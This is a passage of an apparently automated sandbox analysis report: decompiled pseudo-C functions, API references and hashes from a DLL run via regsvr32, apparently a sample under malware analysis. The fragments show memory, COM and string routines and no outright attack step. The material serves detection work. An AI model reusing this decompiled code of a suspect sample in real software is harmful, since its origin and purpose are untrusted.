				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E001E5C35(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x1ea2d4; // 0x4c1d5a8
						_t20 = _t68 + 0x1eb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E001E37AF(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x001e6878
0x001e687b
0x001e688b
0x001e6894
0x001e6898
0x001e6966
0x001e696c
0x001e696c
0x001e68b2
0x001e68b7
0x001e68bb
0x001e68c1
0x001e68c6
0x001e68cd
0x001e68dc
0x001e68dc
0x001e68e0
0x001e68e2
0x001e68ee
0x001e68f9
0x001e6904
0x001e6908
0x001e6912
0x001e6916
0x001e6918
0x001e691d
0x001e6924
0x001e6934
0x001e6934
0x001e691d
0x001e6916
0x001e6936
0x001e693b
0x001e6940
0x001e6940
0x001e6946
0x001e694c
0x001e6951
0x001e6951
0x001e6956
0x001e695b
0x001e695b
0x001e6956
0x001e68e0
0x001e695d
0x001e6963
0x00000000

APIs

Part of subcall function 001E5C35: SysAllocString.OLEAUT32(80000002), ref: 001E5C8C
Part of subcall function 001E5C35: SysFreeString.OLEAUT32(00000000), ref: 001E5CF1

SysFreeString.OLEAUT32(?), ref: 001E6951
SysFreeString.OLEAUT32(001E1E05), ref: 001E695B

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0238af89b206f228c87a0fc7c846f6899b0dca65ab963b20f70f3dbf4fc35ecb
Instruction ID: b56338433c71575193c7ff6656d068f5433db0d266c8bad903651765f0bbef71
Opcode Fuzzy Hash: 0238af89b206f228c87a0fc7c846f6899b0dca65ab963b20f70f3dbf4fc35ecb
Instruction Fuzzy Hash: 30319A72900599AFCB20DF96C888C9FBB79FFD97847504648F8159B211E3319D51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E43C0, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E001E43C0(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x1ea2d4; // 0x4c1d5a8
				_t2 = _t42 + 0x1eb438; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x1ea2d4; // 0x4c1d5a8
					_t6 = _t45 + 0x1eb458; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x1ea2d4; // 0x4c1d5a8
							_t30 = _v8;
							_t12 = _t48 + 0x1eb448; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x001e43cc
0x001e43cd
0x001e43d3
0x001e43da
0x001e43dc
0x001e43e0
0x001e43e4
0x001e43e6
0x001e43ef
0x001e43f5
0x001e43fd
0x001e43ff
0x001e4403
0x001e4405
0x001e4412
0x001e4416
0x001e441b
0x001e4421
0x001e4426
0x001e442e
0x001e4430
0x001e4432
0x001e4438
0x001e4438
0x001e443b
0x001e4441
0x001e4441
0x001e4444
0x001e444a
0x001e444a
0x001e4451

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 001E43FD
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 001E442E

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: 4e26f0f034856d2d81cfe6821a7e40cb280141a1fc41c7c224c41969c37ff101
Instruction ID: d390601ca5f78b8bdb5b36553d8b2bdb92ff1d2df1bacde23481bcc7e835b510
Opcode Fuzzy Hash: 4e26f0f034856d2d81cfe6821a7e40cb280141a1fc41c7c224c41969c37ff101
Instruction Fuzzy Hash: 37214C75A0065AEFCB00DBA4C888D9EB779FF88704B148684E905EB355D731EE41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E2EE0, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 001E2F08

Part of subcall function 001E6872: SysFreeString.OLEAUT32(?), ref: 001E6951

SafeArrayDestroy.OLEAUT32(?), ref: 001E2F55

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: 60d98af3e33adb14da14aba68e5f34d1eea4b5f2240b10b370ff6de4a2588ec8
Instruction ID: 2343753c44b09693c819fda51582bc596898b976ee8cb7ed56670422ab49f1aa
Opcode Fuzzy Hash: 60d98af3e33adb14da14aba68e5f34d1eea4b5f2240b10b370ff6de4a2588ec8
Instruction Fuzzy Hash: 3A115E72A0054ABFDB01DFA9CC45EEEBBB8EF14310F008065FA14E6161D3759A559B91

Uniqueness

Uniqueness Score: -1.00%

Function 001E17B0, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(001E4106), ref: 001E17CA

Part of subcall function 001E6872: SysFreeString.OLEAUT32(?), ref: 001E6951

SysFreeString.OLEAUT32(00000000), ref: 001E180A

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0e3c5b7715b49beb2648ea9e91b4e3410dd0b00d5a1e4a8cad6f39b0b1c2b5da
Instruction ID: f5820b3cf9c6679f9668ee89f69c50ddfb03e056f11ecf4dad92f60b8ba4487d
Opcode Fuzzy Hash: 0e3c5b7715b49beb2648ea9e91b4e3410dd0b00d5a1e4a8cad6f39b0b1c2b5da
Instruction Fuzzy Hash: 2C016D72A0154ABFCB119FA9DC49DAF7BB9FF48310B514021FA05E6120E770AA15DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001E5685, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x1ea294) == 0) {
						E001E5076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x1ea294) == 1) {
						_t10 = E001E6B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x001e568c
0x001e568d
0x001e5690
0x001e56c2
0x001e56c4
0x001e56c4
0x001e5692
0x001e5693
0x001e56a8
0x001e56af
0x001e56b1
0x001e56b1
0x001e56af
0x001e5693
0x001e56cc

APIs

InterlockedIncrement.KERNEL32(001EA294), ref: 001E569A

Part of subcall function 001E6B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 001E6B24

InterlockedDecrement.KERNEL32(001EA294), ref: 001E56BA

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 59da417801a1aac401a0755c9743ac404a29f3ac940149e5c182fe07ed806b0f
Instruction ID: 07acd26d311184f93f5ab564b4861422b66efad8aed4d45abe97b2be8ef78ac3
Opcode Fuzzy Hash: 59da417801a1aac401a0755c9743ac404a29f3ac940149e5c182fe07ed806b0f
Instruction Fuzzy Hash: CCE04F35B04EE297C76A2BA79C04B9E6656AF28B88BC58414B541D1078D710EC40C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 001E6176, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E001E6176(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x1ea290, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x001e617b
0x001e6180
0x001e618e
0x001e6194
0x001e6198
0x001e6209
0x001e619a
0x001e619e
0x001e61a1
0x001e61a4
0x001e61ab
0x001e61ac
0x001e61ad
0x001e61b1
0x001e61b4
0x001e61bb
0x001e61c1
0x001e61c2
0x001e61c2
0x001e61c9
0x001e61ca
0x001e61cb
0x001e61cf
0x001e61db
0x001e61e1
0x001e61e2
0x001e61e2
0x001e61e4
0x001e61ea
0x001e61ec
0x001e61f1
0x001e61f2
0x001e61f2
0x001e61f8
0x001e6201
0x001e6203
0x001e6206
0x001e6215

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 001E618E

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 62f9a151f5da4d743a4de8d8d447228cb7350dd42d6e6f9b038c7e0caea08d00
Instruction ID: 6cf9697c69bb4d48316bba4e7aa3da56969983c830031eeac14e6633c383479a
Opcode Fuzzy Hash: 62f9a151f5da4d743a4de8d8d447228cb7350dd42d6e6f9b038c7e0caea08d00
Instruction Fuzzy Hash: E811EC712453859FEB068F29D851BED7BA5DF63394F54408EE5409F293C277890BC760

Uniqueness

Uniqueness Score: -1.00%

Function 001E4576, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E001E4576(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x1ea2d4; // 0x4c1d5a8
				_t4 = _t15 + 0x1eb390; // 0x4e08938
				_t20 = _t4;
				_t6 = _t15 + 0x1eb124; // 0x650047
				_t17 = E001E6872(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E001E3875(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x001e4580
0x001e4582
0x001e4589
0x001e458a
0x001e458b
0x001e458c
0x001e4592
0x001e4597
0x001e4597
0x001e45a1
0x001e45b3
0x001e45ba
0x001e45e9
0x001e45bc
0x001e45c1
0x001e45e6
0x001e45c3
0x001e45c6
0x001e45cd
0x001e45d8
0x001e45cf
0x001e45d2
0x001e45d2
0x001e45dc
0x001e45dc
0x001e45c1
0x001e45f0

APIs

Part of subcall function 001E6872: SysFreeString.OLEAUT32(?), ref: 001E6951

Part of subcall function 001E3875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,001E71C8,004F0053,00000000,?), ref: 001E387E
Part of subcall function 001E3875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,001E71C8,004F0053,00000000,?), ref: 001E38A8
Part of subcall function 001E3875: memset.NTDLL ref: 001E38BC

SysFreeString.OLEAUT32(00000000), ref: 001E45DC

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 003256428627e99c01f3c7799f4feb2f280e634d7134de99c83dc2e0ed3180a1
Instruction ID: 4dca065d87e6eaf75c5aee8aa84a29a5ba8797dd31df3005df305f3683fe9734
Opcode Fuzzy Hash: 003256428627e99c01f3c7799f4feb2f280e634d7134de99c83dc2e0ed3180a1
Instruction Fuzzy Hash: 0401BC325004A9FFCB219FA9CC44CAEBBB8FF08750F004526FA01E6020D3B0AA629791

Uniqueness

Uniqueness Score: -1.00%

Function 001E1CEF, Relevance: 1.5, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E001E1CEF(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E001E6176(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x1ea2d4; // 0x4c1d5a8
						_t9 = _t17 + 0x1eb9d4; // 0x444f4340
						_t20 = E001E2F68( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x1ea290, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x001e1cf2
0x001e1cf8
0x001e1d4f
0x001e1cfe
0x001e1d09
0x001e1d0e
0x001e1d12
0x001e1d1f
0x001e1d27
0x001e1d33
0x001e1d3b
0x001e1d45
0x001e1d45
0x001e1d12
0x001e1d54

APIs

Part of subcall function 001E6176: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 001E618E

Part of subcall function 001E2F68: lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 001E2F9C
Part of subcall function 001E2F68: StrStrA.SHLWAPI(00000000,?), ref: 001E2FA9
Part of subcall function 001E2F68: RtlAllocateHeap.NTDLL(00000000,?), ref: 001E2FC8

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,001E6792), ref: 001E1D45

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Heap$Allocate$Freelstrlen
String ID:
API String ID: 2220322926-0
Opcode ID: 6083301dcca94de15d2bca45591786f92c09f7c4c232625ef380a2534b96126c
Instruction ID: dc28d78358be4d0ac61a21235ad0d7e0ee5f1fd35459000c82465499f3c6b07f
Opcode Fuzzy Hash: 6083301dcca94de15d2bca45591786f92c09f7c4c232625ef380a2534b96126c
Instruction Fuzzy Hash: 85016976100949FFCB228B86CD44EAE7BBDEB64390F104029FA099A170E731EA44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001E6837, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E6837(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x1ea290, 0, _a4); // executed
				return _t2;
			}

0x001e6843
0x001e6849

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: de9c4a1bc56ace581a112bb404a0174535d2ac206395b0ef091f3ad99ce31eee
Instruction ID: d7acbfcfea10a654894ec78b309611ebbec41e5dad6abdd70610a9eae8c6b5e4
Opcode Fuzzy Hash: de9c4a1bc56ace581a112bb404a0174535d2ac206395b0ef091f3ad99ce31eee
Instruction Fuzzy Hash: 6BB01271014140ABCA028B80DD44F0E7B32BB50B40F514010B3041C87082321460EB05

Uniqueness

Uniqueness Score: -1.00%

Function 001E50CA, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E50CA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x1ea290, 0, _a4); // executed
				return _t2;
			}

0x001e50d6
0x001e50dc

APIs

RtlFreeHeap.NTDLL(00000000,00000000,001E4239,00000000,00000001,?,00000000,?,?,?,001E6B8D,00000000,?,00000001), ref: 001E50D6

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 66f3354adab6cff143efdc21a5cf06d39c7e36d16a8fa1cbc8c8f79b5d203adf
Instruction ID: bda9baf7fa9ee50d7a46b833a5a86a065ac9f585ba19c41ace168f7bb6e7c9ca
Opcode Fuzzy Hash: 66f3354adab6cff143efdc21a5cf06d39c7e36d16a8fa1cbc8c8f79b5d203adf
Instruction Fuzzy Hash: 1CB012B1104140ABCB124B81DE44F0D7B62BB50B00F414010B3081C87082321460FB16

Uniqueness

Uniqueness Score: -1.00%

Function 001E2BE3, Relevance: 1.3, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E2BE3(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E001E56CF(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E001E6837(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E001E50CA(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E001E3984(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E001E39C5(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}

0x001e2bee
0x001e2bf1
0x001e2bfa
0x001e2bfd
0x001e2c00
0x001e2c03
0x001e2cff
0x001e2d03
0x001e2c15
0x001e2c21
0x001e2c28
0x001e2c2f
0x00000000
0x00000000
0x001e2c35
0x001e2c3d
0x00000000
0x00000000
0x001e2c43
0x001e2c4c
0x001e2c50
0x00000000
0x00000000
0x001e2c52
0x001e2c59
0x001e2c5e
0x001e2c60
0x001e2c63
0x001e2ce4
0x001e2ceb
0x001e2ced
0x00000000
0x00000000
0x001e2cef
0x001e2cf3
0x001e2cf8
0x001e2cf8
0x00000000
0x001e2cf3
0x001e2c6a
0x001e2c72
0x001e2c72
0x001e2c7b
0x001e2c89
0x001e2ce0
0x001e2ce0
0x00000000
0x001e2cac
0x001e2caf
0x00000000
0x001e2caf
0x001e2c89
0x001e2cbe
0x001e2ccc
0x001e2cd1
0x001e2cd3
0x001e2ce8
0x00000000
0x001e2ce8
0x001e2cd5
0x001e2cdb
0x001e2cde
0x00000000
0x00000000
0x00000000
0x001e2cde

APIs

memcpy.NTDLL(00000000,?,?,?,?,001E20FA,?,001E20FA,?,001E20FA), ref: 001E2C6A

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: b886c889b787119bcde1e23be31950f49dad5c5448809bc4e40c6d9cf0c01973
Instruction ID: 173164a66d07e74256cad8ed6f06ed7b4ef90fc7d1bc56b41e6b296539b4a172
Opcode Fuzzy Hash: b886c889b787119bcde1e23be31950f49dad5c5448809bc4e40c6d9cf0c01973
Instruction Fuzzy Hash: 9E313B71A00A59EFDF25DEA6CC90EBEB7B8BB14308F2040A9F515A3141D7709E84DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001E5384, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E5384(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E001E6A36(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x1ea290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
